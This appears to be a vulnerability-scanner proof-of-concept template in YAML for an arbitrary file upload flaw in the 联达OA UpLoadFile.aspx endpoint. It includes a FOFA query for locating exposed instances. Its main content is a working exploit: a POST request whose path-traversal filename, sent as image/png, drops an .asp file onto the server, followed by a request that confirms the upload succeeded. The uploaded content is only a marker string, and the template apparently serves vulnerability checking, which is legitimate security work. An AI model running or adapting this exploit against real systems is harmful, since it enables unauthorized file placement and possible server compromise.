product: 联达OA
vName: 联达OA UpLoadFile.aspx接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 联达oa是北京联达动力信息科技股份有限公司推出的新一代OA系统,支持100+应用自行安装与定义,应用表单自定义,支持应用无代码开发,支持多语言。联达OA UpLoadFile.aspx接口存在任意文件上传漏洞。
version: ''
note: ''
search:
  FOFA: app="联达OA"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485971&idx=2&sn=1eb9e5a46400b4cc7397129578694b26&chksm=974b8714a03c0e028917c431a4e31adbf529ba070ed3891e9552754244925d36f50c95d18947&scene=178&cur_album_id=2873032428486115330#rd
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: FileManage/UpLoadFile.aspx
      file:
        file:
          - ../52e039302a62d077.asp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - image/png
      dataJson:
        DesignId: '1'
    verify:
      path: /FileManage/52e039302a62d077.asp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and